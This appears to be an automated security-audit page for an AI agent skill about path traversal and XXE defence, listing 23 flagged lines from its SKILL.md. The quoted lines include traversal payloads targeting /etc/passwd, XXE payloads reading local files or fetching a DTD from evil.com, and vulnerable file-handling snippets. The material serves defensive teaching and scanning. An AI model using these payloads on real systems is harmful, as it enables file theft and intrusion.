perseus-file

Perseus File analyzes file security vulnerabilities like path traversal and XXE in user codebases, ensuring robust defense against attacks.

Security score: 0/100

The perseus-file skill was audited on Mar 1, 2026 and we found 23 security issues across 3 threat categories, including 2 critical. Review the findings below before installing.

Security Issues

medium line 84

Template literal with variable interpolation in command context

Source: SKILL.md:84
fs.readFileSync(`./uploads/${filename}`); // filename = "../../../etc/passwd"
medium line 160

Template literal with variable interpolation in command context

Source: SKILL.md:160
fs.writeFileSync(`./data/${req.body.filename}`, content);
medium line 170

Template literal with variable interpolation in command context

Source: SKILL.md:170
fs.unlinkSync(`./uploads/${req.params.file}`);
medium line 266

Template literal with variable interpolation in command context

Source: SKILL.md:266
const dest = `uploads/${req.file.originalname}`;
medium line 269

Template literal with variable interpolation in command context

Source: SKILL.md:269
const dest = `uploads/${crypto.randomUUID()}${ext}`;
high line 485

Template literal with variable interpolation in command context

Source: SKILL.md:485
res.sendFile(`./uploads/${file}`);
high line 84

Access to /etc/passwd

Source: SKILL.md:84
fs.readFileSync(`./uploads/${filename}`); // filename = "../../../etc/passwd"
high line 179

Access to /etc/passwd

Source: SKILL.md:179
../../../etc/passwd
high line 182

Access to /etc/passwd

Source: SKILL.md:182
....//....//....//etc/passwd
high line 183

Access to /etc/passwd

Source: SKILL.md:183
..\/..\/..\/etc/passwd (Windows)
high line 325

Access to /etc/passwd

Source: SKILL.md:325
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
high line 433

Access to /etc/passwd

Source: SKILL.md:433
// Attack: file:///etc/passwd
critical line 449

Access to /etc/passwd

Source: SKILL.md:449
| Path Traversal | `../../../etc/passwd` | File contents returned |
critical line 491

Access to /etc/passwd

Source: SKILL.md:491
GET /download?file=../../../etc/passwd
medium line 84

Path traversal to sensitive directory

Source: SKILL.md:84
fs.readFileSync(`./uploads/${filename}`); // filename = "../../../etc/passwd"
medium line 179

Path traversal to sensitive directory

Source: SKILL.md:179
../../../etc/passwd
high line 449

Path traversal to sensitive directory

Source: SKILL.md:449
| Path Traversal | `../../../etc/passwd` | File contents returned |
high line 491

Path traversal to sensitive directory

Source: SKILL.md:491
GET /download?file=../../../etc/passwd
low line 301

External URL reference

Source: SKILL.md:301
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
low line 302

External URL reference

Source: SKILL.md:302
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
low line 303

External URL reference

Source: SKILL.md:303
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
low line 329

External URL reference

Source: SKILL.md:329
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/">]>
low line 332

External URL reference

Source: SKILL.md:332
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/xxe.dtd">%xxe;]>
Scanned on Mar 1, 2026